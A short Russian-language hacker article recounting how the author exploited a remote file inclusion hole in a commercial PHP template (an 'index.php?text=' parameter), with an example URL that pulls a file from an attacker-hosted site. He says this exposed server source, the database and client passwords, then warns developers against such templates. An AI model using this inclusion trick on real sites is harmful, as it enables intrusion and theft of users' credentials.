Простые шаблоны - опасность хака

Автор: pauk Сайт: http://www.pauk2001.h1.ru/
   
   
   Однажды я достал скрипт одного проекта, за который горе-разработчики просили 500 баксов:), и вот как...
   Зашел на официальный сайт. Смотрю,а люди эти "упростили" себе жизнь, они создали страницу - заголовок сверху/меню сбоку/счетчики внизу - стандарт. Ну а текст как всегда в центре.А сам текст они выводили таким способом:
   
   http://www.xxx.com/index.php?text=main
   
   и в контент вставлялся файл main.php и тд...
   И мне пришла в голову идея: создать на Народе сайт (там РНР не исполняется при вызове), а через ссылку типа
   
   http://www.xxx.com/index.php?text=http://xxx.narod.ru/myurl
   
   я вызвал файл myurl.php, и таким образом я узнал через show_source() код PHP-файлов на сервере (а еще говорят, такое невозможно :)) , мало того - я узнал таким способом содержимое базы и каталогов, получил возможность поменять все, узнал пароли и е-майлы клиентов (а соответственно и пароли е-майлов 50% клиентов - не секрет, что у половины везде один пароль).
   
   Все сделал я за 40-50 минут. Человек, обиженный на проект, таким образом может сильно навредить и админам, и простым клиентам. Как порядочный человек, написал я им письмо о дыре, и надо сказать, через 30 минут вышли в асю, и попросили не мешать продавать свои скрипты народу, обещают за молчание 1 (Один) доллар США на WebMoney заплатить :p
   
   Я не указываю страницу проекта, потому как "крутые " хакеры (кому мама-папа неделю назад книгу типа "РНР для придурков за 20 минут" купили) этим воспользуются, скажу только: таких страниц в сети очень много - людям не следует гнаться за легким :)
   
   Так что:
   1) Не используйте подобные "легкие" шаблоны - дорого может обойтись
   2) Будьте внимательны при покупке. 500 баксов стоил скрипт, а мне он обошелся около 10 рублей (время интернета)
   
   ЗЫ. Призываю не повторять мои действия для нанесения вреда!
   Во-первых, люди писали-старались все-таки, хоть и ручки кривые да пальцы кучерявые, но вредить им не рекомендую:D
   Во-вторых, на серверах ведутся логи, а причинение вреда - уголовно наказуемое деяние.
   
   ЗЫЗЫ. Если вы все-таки решили навредить, то сначала надобно научится заметать следы, а это тема для другого разговора. Все равно попадетесь, а потом не ссылайтесь на эту статью как на причину своих бед.
   
Опубликовано: HTTP://WWW.R-T-F-M.INFO, pauk ©® 2000-2011.
All rights reserved.
При перепечатки ссылка на сайт обязательна.
Мнение администрации сайта не всегда совпадает с мнением автора..